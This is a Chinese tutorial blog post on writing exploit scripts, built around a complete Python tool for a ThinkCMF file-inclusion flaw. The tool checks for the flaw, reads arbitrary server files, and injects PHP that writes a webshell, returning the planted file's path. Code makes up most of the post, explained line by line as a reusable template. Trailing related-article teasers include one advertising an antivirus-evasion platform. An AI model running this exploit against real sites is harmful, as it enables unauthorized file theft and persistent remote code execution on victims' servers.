POCEXP编写—EXP编写实战(1)

news2024/12/21 8:01:44

@TOC

1. 前言

通过上一篇文章的了解,应该都了解了POC是怎么编写的,而且POCEXP的区别就是POC只能验证漏洞,简单来说就是通过判断特定的响应值来判断是否存在漏洞,而且EXP就需要将响应的内容给返回回来,但是整体在编写的时候基本上都差不多!关于用的模块或者参数除非是前面没了解过的,否则不再进行赘述,请查看前面的文章!

整体来说,当你编写一个POCEXP后,后续的编写基本上都是套模板,除非遇到一些很复杂的漏洞,可能需要修改很多内容,否则一般的漏洞基本上就是修改模板。

2. thinkcmf 文件包含

这里我还是沿用之前的POC,在POC中添加EXP部分,我个人的理解以及在日常使用中写这些验证脚本,很多情况下普遍都是只写一个EXP或者POC就结束了,相对复杂一点的漏洞很多都是只有POC,由于较为复杂的漏洞EXP编写起来会很麻烦,同时不同的情况下也会导致脚本出现异常。

当然这里如果是大佬编写的脚本或代码水平不错的人写出的脚本,相对来说质量更好,并且编写EXP可能需要多个环境测试,例如我这里编写的脚本都是基于网站上靶机去编写的,自然可能会遇到在实际的情况中不符的情况,那么就需要不断的更改,很多情况下例如POC,是否能够准确的验证出来,取决于返回包的内容是否能够进行判断,至于URL,漏洞的URL都是固定的,这个没什么疑惑。

这里我直接放置这个文件包含的,整体POCEXP,当然你分开也可以,仔细观察这些代码,其实能够看出来,基本上就是一套模板,然后根据返回的响应内容来进行二次判断。

当然我这边的代码其实并不是很周全,比如关于输入的httphttps的校验等等均没有写,这个就属于处理用户输入进来的内容,这部分涉及不到很复杂的内容,自己修改吧!

import argparse
import requests
import sys
import re

import requests


def poc(url, port):
    payload = "/?a=display&templateFile=README.md"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        if r.status_code == 200 and "ThinkCMF是一款" in r.text:
            print(f"[+]{url}存在Thinkcmf文件包含漏洞")
        else:
            print(f"[-]{url}不存在Thinkcmf文件包含漏洞")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def exp(url, port, document):
    payload = f"/?a=display&templateFile={document}"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        if r.status_code == 200 and match:
            print(match.group(1).strip())
        else:
            print("没有找到匹配的内容")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def exp1(url, port, contain, execute):
    payload = f"/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27{contain}%27,{execute})%3C/php%3E"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        if r.status_code == 200:
            print(f"木马访问路径:{url}:{port}/{contain}")
        else:
            print("木马疑似为写入失败!")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def main():
    banner = """
d888888P dP       oo          dP        a88888b. 8888ba.88ba   88888888b 
   88    88                   88       d8'   `88 88  `8b  `8b  88        
   88    88d888b. dP 88d888b. 88  .dP  88        88   88   88 a88aaaa    
   88    88'  `88 88 88'  `88 88888"   88        88   88   88  88        
   88    88    88 88 88    88 88  `8b. Y8.   .88 88   88   88  88        
   dP    dP    dP dP dP    dP dP   `YP  Y88888P' dP   dP   dP  dP        
    """
    print(banner)
    print("Vulnerability version: x1.6.0-x2.2.3")
    print("")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
    parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
    parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")
    parser.add_argument("-c", dest="contain", required=False, default=None,
                        help="Trojan name (if selected, you must select the -e parameter to add the code to execute)")
    parser.add_argument("-e", dest="execute", required=False, default=None,
                        help="Executed command (must take -c argument and URL encoded code)")

    args = parser.parse_args()

    try:
        if args.contain and args.execute:
            exp1(args.url, args.port, args.contain, args.execute)
        elif args.document:
            exp(args.url, args.port, args.document)
        elif args.url:
            poc(args.url, args.port)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()

2.1. 解析第一个EXP()

这里我们解析的一个EXP,关于POC应该没什么好说的,在之前都已经说过了,同时想要看懂代码,我觉得最简单的就是去看一下复现的流程!

这个EXP主要是用于实现文件包含内容。

以下代码均是靶机,可能与现实中存在不符,同时没有进行过多的测试,主要是介绍思路,并非编写EXP

复现参考:thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现_thinkcmf 文件包含 x1.6.0-x2.2.3 vulfocus-CSDN博客

执行代码:

def exp(url, port, document):
    ##漏洞url访问链接,document就是用于接收用户输入进来想要进行文件包含的内容。
    payload = f"/?a=display&templateFile={document}"
    ##拼接URL
    url1 = f"{url}:{port}{payload}"
    ##请求头
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    ##异常捕捉
    try:
        ##发送get请求
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        ##正则匹配看下面的模块介绍
        pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        ##判断响应是否为200,根据burp显示的响应来判断,同时正则匹配到的数据是否存在
        if r.status_code == 200 and match:
            ##返回第一个括号内匹配到的内容,也就是<div id="think_page_trace"之前的所有内容,strip()方法用于去除字符串两端的空白字符(包括换行符和空格)。
            print(match.group(1).strip())
        else:
            print("没有找到匹配的内容")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)

选项代码:

##添加url
parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
##添加端口
parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
##添加用户需要包含的文件名
parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")

2.1.1. re模块

参考链接:python——正则表达式(re模块)详解_python re正则-CSDN博客

在Python中,re 模块是用于处理正则表达式的标准库。正则表达式(Regular Expression,简称 regex 或 regexp)是一种强大的文本处理工具,它使用一种特殊的语法来匹配和操作字符串。通过 re 模块,你可以轻松地在Python程序中执行各种复杂的文本搜索和替换操作。

以下是 re 模块中一些常用的函数和方法:

2.1.1.1. 编译正则表达式
re.compile(pattern, flags=0)

这个函数用于将正则表达式字符串编译成一个正则表达式对象,以便后续使用。flags 参数用于设置正则表达式的匹配模式,如 re.IGNORECASE(忽略大小写)或 re.MULTILINE(多行模式)。

2.1.1.2. 匹配操作
  • re.match(pattern, string, flags=0):从字符串的起始位置匹配正则表达式,如果起始位置匹配成功则返回一个匹配对象,否则返回 None
  • re.search(pattern, string, flags=0):扫描整个字符串并返回第一个成功的匹配。如果字符串中没有匹配项,则返回 None
  • re.findall(pattern, string, flags=0):在字符串中找到正则表达式所匹配的所有子串,并返回一个列表,如果没有找到匹配的,则返回空列表。
  • re.finditer(pattern, string, flags=0):和 findall 类似,但返回的是一个迭代器,其中每个元素都是一个匹配对象。
2.1.1.3. 替换操作
re.sub(pattern, repl, string, count=0, flags=0)

这个函数用于在字符串中查找匹配正则表达式的子串,并将其替换为指定的字符串。count 参数用于指定最多替换次数,默认为0,表示替换所有匹配项。

2.1.1.4. 分割操作
re.split(pattern, string, maxsplit=0, flags=0)

这个函数按照能够匹配的子串将字符串分割后返回列表。maxsplit 用于指定最大分割次数,默认为0,表示不限制分割次数。

2.1.1.5. 匹配对象的方法

匹配对象(由 match()search() 返回)有一些方法可以用于获取匹配信息:

  • group(num=0):返回整个匹配对象,或者编号为 num 的子组。
  • groups():返回一个包含所有匹配子组的元组(如果没有子组,则返回空元组)。
  • start([group])end([group]):返回匹配或子组在字符串中的开始和结束位置。
  • span([group]):返回一个包含匹配或子组在字符串中的开始和结束位置的元组。

这只是 re 模块功能的一部分。正则表达式本身是一门深奥的学问,涉及许多复杂的语法和概念。但通过 re 模块,你可以轻松地在Python中利用正则表达式的强大功能来处理文本数据。

2.1.2. 分析代码中re

关于这里不懂的,可以直接将代码发给AI分析,同时如果re模块用的不熟,其实也可以将返回响应值,发给AI,让AI帮忙写re正则,然后自己再去修改。

pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        ##判断响应是否为200,根据burp显示的响应来判断,同时正则匹配到的数据是否存在
        if r.status_code == 200 and match:
            ##返回第一个括号内匹配到的内容,也就是<div id="think_page_trace"之前的所有内容,strip()方法用于去除字符串两端的空白字符(包括换行符和空格)。
            print(match.group(1).strip())

从上述的代码中我们结合下图来进行分析,我们需要获取到的是红框框选起来的内容,如果我们直接将r.text输出的话,那么我们的内容会是很多的,包含下面的div代码都会输出出来。而我们需要的只有红框中的内容,那么就可以使用re,去匹配这些内容。

我这里观察到,不管是执行config.yaml文件还是Nginx.conf文件,代码响应包下面都有div代码,那么我们就可以使用re去查找。

image-20240415134129193

pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"

而这里的代码意思就是从r中寻找到<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;这行内容,这里的r就是,我们发送完get请求返回的内容,默认输出的时候是执行r.text,而这里我们将r交个re处理,然后这行结尾之前的内容保存到pattern中。

match = re.search(pattern, r.text, re.DOTALL)

然后使用re库的search方法在r.text(请求的响应文本)中搜索与pattern匹配的内容。re.DOTALL标志使得.能够匹配任何字符,包括换行符。

 if r.status_code == 200 and match:
    print(match.group(1).strip())

检查HTTP请求是否成功返回(状态码为200),检查是否找到了与正则表达式匹配的内容,当两个条件满足后,这行代码会打印出匹配到的第一个分组(即正则表达式中的(.*?)部分)的内容,并使用strip()方法去除首尾的空白字符。

2.1.3. 执行效果

这里忽略字符画的CVE编号,主要是我模板写错了,我也没修改了。

image-20240415135957565

2.2. 解析第二个EXP1()

第二个EXP主要是用于实现木马上传作用,整体来说,我觉得EXPPOC没有如何的区别,本质上也就是执行的payload不同,所以再编写上,本质无任何区别。

执行代码:

##这里contain是木马名称,execute是代码命令(需要进行url编码)
def exp1(url, port, contain, execute):
    ##漏洞URL,拼接命令
    payload = f"/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27{contain}%27,{execute})%3C/php%3E"
    ##拼接url
    url1 = f"{url}:{port}{payload}"
    ##请求头
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    ##异常捕捉
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        ##判断上传成功与否
        if r.status_code == 200:
            ##返回木马路径
            print(f"木马访问路径:{url}:{port}/{contain}")
        else:
            print("木马疑似为写入失败!")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)

选项代码:

这里选项代码,需要注意 -c-e必须一起使用,后面的提示我也写了,如果不一起使用,可能就会执行其他的语句或者直接报错。

##添加url
parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
##添加端口
parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
##添加用户需要包含的文件名
parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")
##添加木马名称
parser.add_argument("-c", dest="contain", required=False, default=None,
                        help="Trojan name (if selected, you must select the -e parameter to add the code to execute)")

##添加木马内的代码
parser.add_argument("-e", dest="execute", required=False, default=None,
                        help="Executed command (must take -c argument and URL encoded code)")

这里会发现-c是木马的文件名.后缀,-e是文件中的命令,这里还需要将命令进行URL编码,这里不在代码中进行编码,是由于如果在cmd中直接输入命令会出现无法输入的情况,当然这个是可以解决的:

首先输入的时候加上双引号,在代码中对输入进行的内容进行替换只取双引号直接的内容,如何进行url编码,传参上去执行,当然我不想写就这样吧!感兴趣的自己去修改一下代码,前往别脑子会了,手不会,多练习,不是看一遍后,就觉得编写代码这么简单,结果下次还不会。

image-20240415140916285

2.2.1. 执行后的效果

这里忽略URL地址,由于是开的在线靶场,有时间限制,一边写一边测试,就会过期,如何就得重新开。

image-20240415141524623

2.3. 用户选项执行判断

这里我就简单说一下吧,下面的代码主要是判断用户输入的参数是那些,根据输入的参数来判断执行的是POC还是EXP,或者说能听懂的,就是用户是只想测试一下有没有漏洞,还是想要读取一下文件内容,亦或者想要上传个文件。

    try:
        if args.contain and args.execute:
            exp1(args.url, args.port, args.contain, args.execute)
        elif args.document:
            exp(args.url, args.port, args.document)
        elif args.url:
            poc(args.url, args.port)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False

而自上而下的内容指定好,例如,如果你将判断用户 elif args.url:放在第一行,那么肯定有问题的,因为我们url是强制性必须输入,那么你后续不管输入多少个参数,都会执行第一行,因为匹配到url了。

所以你看我匹配的第一行是用户有没有输入文件名同时输入命令代码,如果输入了那么和执行文件上传的代码,如果输入了文件名,那么就执行文件包含的代码,如果只输入的URLport,那么就进行一个普通的poc验证。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1625424.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vue中的mixin(局部混入、全局混入)

一、mixin是什么 Mixin是面向对象程序设计语言中的类&#xff0c;提供了方法的实现。其他类可以访问mixin类的方法而不必成为其子类&#xff1b;Mixin类通常作为功能模块使用&#xff0c;在需要该功能时“混入”&#xff0c;有利于代码复用又避免了多继承的复杂 Vue中的mixin…

低空经济概念

低空经济是指利用低空空域资源&#xff0c;通过低空交通工具和技术创新发展&#xff0c;促进航空产业、旅游、物流、紧急救援等多领域经济增长和产业融合。随着科技的不断进步和航空产业的快速发展&#xff0c;低空经济正逐渐成为全球经济的重要组成部分。 一、低空经济的主要特…

大数据计算引擎中的Calcite

1.Calcite介绍 Calcite是一个动态数据库管理框架&#xff0c;具备数据库管理系统的功能 Calcite具备SQL解析、校验、优化、生成、连接查询等功能 Calcite能够为不同平台和数据源提供统一的查询引擎 2.Calcite能力 比如&#xff0c;对于HBase而言&#xff0c;没有SQL查询的能力…

✨“光纤通信新篇章:BiDi单纤模块的原理与应用”

&#x1f4a1;目录 ❓什么是BiDi单纤模块&#xff1f; &#x1f527;BiDi光模块的工作原理 &#x1f31f;BiDi光模块的优势 &#x1f335;BiDi光模块类型介绍 &#x1f320;BiDi SFP光模块 &#x1f320;BiDi SFP光模块 &#x1f320;BiDi X2光模块 &#x1f320;BiDi …

科技论文网站:中国科技论文在线

文章目录 1. Intro2. Main3. Cons Evaluation彩蛋&#xff1a;科学素质 这是作者最后一次发这种级别的科普文章 1. Intro 中国科技论文在线是经教育部批准&#xff0c;由教育部科技发展中心主办&#xff0c; 利用现代信息技术手段&#xff0c;打破传统出版物的概念&#xff0c…

NLP step by step -- 了解Transformer

Transformer模型 Transformer相关历史 首先我们先看一下有关Transformer模型的发展历史&#xff0c;下面的图是基于Transformer架构的一些关键模型节点&#xff1a; 图片来源于Hugging Face 图片来源于Hugging Face Transformer 架构 于 2017 年 6 月推出。原本研究的重点是…

GITEE 基于OAuth2的API V5版本

为了构建更好的码云生态环境&#xff0c;我们推出了基于OAuth2的API V5版本。 API V5接口使用方式以及Url都参照GitHub&#xff0c;为了各位开发者更好的兼容已经存在的第三方应用。 API 使用条款 OSCHINA 用户是资源的拥有者&#xff0c;需尊重和保护用户的权益。不能在应用…

信创需求激增,国产服务器操作系统赋能数字化转型

信创&#xff0c;即信息技术应用创新&#xff0c;是指在关键领域和环节推进信息技术的自主创新&#xff0c;构建安全可控的信息技术体系。随着数字化转型的加速&#xff0c;信创需求激增&#xff0c;国产服务器操作系统在其中扮演着至关重要的角色。国产服务器操作系统如何赋能…

TikTok营销攻略:如何精准测试与优化品牌营销策略

在当今数字营销的世界中&#xff0c;社交媒体平台已成为吸引目标受众的重要工具。而TikTok&#xff0c;作为一个快速崛起的视频分享平台&#xff0c;在年轻人中享有巨大的流行度。对于那些希望利用这一平台进行营销的品牌和营销人员来说&#xff0c;了解如何在TikTok上测试营销…

[Rust开发]在Rust中使用geos的空间索引编码实例

geos的空间索引用的是STRTree&#xff0c;这是一种基于STR算法的四叉树索引&#xff0c;有如下特点&#xff1a; 使用Sort-Tile-Recursive (STR) 算法创建的仅查询的R-tree空间索引 STR(Sort-Tile-Recursive,递归网格排序) 基本思想是将所有的矩形以“tile”的方式分配到r/n&a…

使用Azure AI Search和LlamaIndex构建高级RAG应用

RAG 是一种将公司信息合并到基于大型语言模型 &#xff08;LLM&#xff09; 的应用程序中的常用方法。借助 RAG&#xff0c;AI 应用程序可以近乎实时地访问最新信息&#xff0c;团队可以保持对其数据的控制。 在 RAG 中&#xff0c;您可以评估和修改各个阶段以改进结果&#x…

大型企业高效内部协同,向日葵SDK私有化部署案例解析

大型集团企业的内部&#xff0c;沟通协作的重要性不言而喻&#xff0c;我们时常能听到关于所谓“大企业病”的吐槽&#xff0c;多数也是源于企业内部沟通协作效率低&#xff0c;进而导致内耗加重。甚至我们可以这么说&#xff0c;越是发展壮大的集团企业&#xff0c;其内部的沟…

力扣刷题学习(跟随视频学着刷)

使用入门 视频链接 【手把手带你刷Leetcode力扣&#xff5c;各个击破数据结构和算法&#xff5c;大厂面试必备技能【已完结】-哔哩哔哩】 https://b23.tv/vIcRT61 时空复杂度 时间&#xff1a; 空间&#xff1a;主要有O(1)和O(n)两种&#xff0c;只用计算开辟的内存&#xff…

3月份牛奶线上市场数据分析:销售额累计近18亿元

随着消费者健康意识的提升&#xff0c;牛奶作为日常营养补充品&#xff0c;其市场需求逐年增加。线上市场具有购买便捷性、价格透明性等优势&#xff0c;越来越多的消费者倾向于线上购买。 今年3月份&#xff0c;牛奶乳品市场呈现稳定发展状态。根据鲸参谋数据显示&#xff0c…

深度解析1688关键字搜索API接口:技术实现与应用探索

1688关键字搜索API接口的技术实现主要依赖于阿里巴巴开放平台提供的API服务。商家和开发者通过调用这些API接口&#xff0c;可以实现商品的搜索、排序、筛选、分页等功能。具体来说&#xff0c;技术实现主要包括以下几个步骤&#xff1a; 注册并获取API密钥&#xff1a;首先&am…

python爬虫插件XPath的安装

概要 XPath Helper是一款专用于chrome内核浏览器的实用型爬虫网页解析工具。XPath可以轻松快捷地找到目标信息对应的Xpath节点&#xff0c;获取xpath规则&#xff0c;并提取目标信息&#xff0c;并进行校对测试&#xff1b;可对查询出的xpath进行编辑&#xff0c;正确编辑的结…

一文解析golang中的协程与GMP模型

文章目录 前言1、线程实现模型1.1、用户级线程与内核级线程1.2、内核级线程模型1.3、用户级线程模型1.3、两级线程模型 2、GMP模型2.1、GMP模型概述2.1、GMP v1版本 - GM模型2.2、GMP v2版本 - GMP模型2.3、GMP相关源码2.4 调度流程2.5 设计思想 3.总结 前言 并发(并行&#x…

Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式

Golang-Gin 框架写的免杀平台&#xff0c;内置分离、捆绑等多种BypassAV方式 Golang-Gin 框架写的免杀平台&#xff0c;内置分离、捆绑等多种BypassAV方式。 cool 时间线&#xff1a; Golang Gin 框架写的免杀平台- (2021.11.12)Golang Gin 框架写的免杀平台&#xff0c;更…

CVPR往年论文查看

这个就是查看论文的网站&#xff1a;https://openaccess.thecvf.com/ 先别急&#xff0c; 看完再操作&#xff0c;听话&#xff01;&#xff01; 如果你要查看CVPR2022年的论文那么就在网站后加上CVPR2022 例如:https://openaccess.thecvf.com/CVPR2022 如果是2023年的那么…

赋能智慧校园!A3D数字孪生可视化,轻量又高效!

放假之后&#xff0c;学生们会逐步返学&#xff0c;大量人员出入校园&#xff0c;安全更是不容忽视&#xff0c;如何在短时间内对大批人员及设施进行智能监管&#xff1f;数字化转型是关键手段&#xff0c;我们可以融合线上线下数据&#xff0c;搭建3D立体的智慧校园&#xff0…